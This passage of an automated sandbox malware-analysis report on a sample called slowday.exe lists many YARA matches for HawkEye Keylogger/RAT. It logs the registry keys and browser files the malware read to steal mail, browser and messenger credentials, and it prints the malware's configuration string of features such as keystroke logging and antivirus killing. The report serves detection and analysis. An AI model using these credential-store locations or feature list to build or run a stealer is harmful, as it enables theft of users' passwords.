            Source: Yara matchFile source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.508932595.0000000003234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.509181368.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2988, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3004, type: MEMORYSTR
            Yara detected HawkEye Keylogger
            Source: Yara matchFile source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Yara detected WebBrowserPassView password recovery tool
            Source: Yara matchFile source: 19.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.680dc50.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.6771c10.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.RegAsm.exe.47c35a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.6a21c10.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.ec0345.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.4af0000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.6abdc50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.66d5bd0.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.RegAsm.exe.47c38ed.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.4af0345.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.6985bd0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.RegAsm.exe.43635a8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.RegAsm.exe.43635a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.RegAsm.exe.43638ed.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.RegAsm.exe.47c38ed.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.ec0000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.RegAsm.exe.47c35a8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.ec0345.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.3.RegAsm.exe.43638ed.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.4af0000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.6771c10.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.6abdc50.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.4af0345.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.680dc50.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.6a21c10.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.66d5bd0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.6985bd0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.322785031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.265133062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.265486423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.281820570.0000000004363000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.335659001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.323179438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.244008454.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.507015977.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.289449551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.251237329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.305602938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.335973967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.507883137.0000000002D53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.305230219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.507560729.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.287929150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.507298136.0000000003106000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.250547287.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.507684707.0000000003176000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.289148039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.287452128.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.507061368.0000000003012000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.507223314.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.510395381.0000000006981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.510712691.00000000066D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6984, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6244, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3356, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4724, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7084, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5852, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 408, type: MEMORYSTR
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected HawkEye Keylogger
            Source: Yara matchFile source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Detected HawkEye Rat
            Source: slowday.exe, 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: slowday.exe, 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
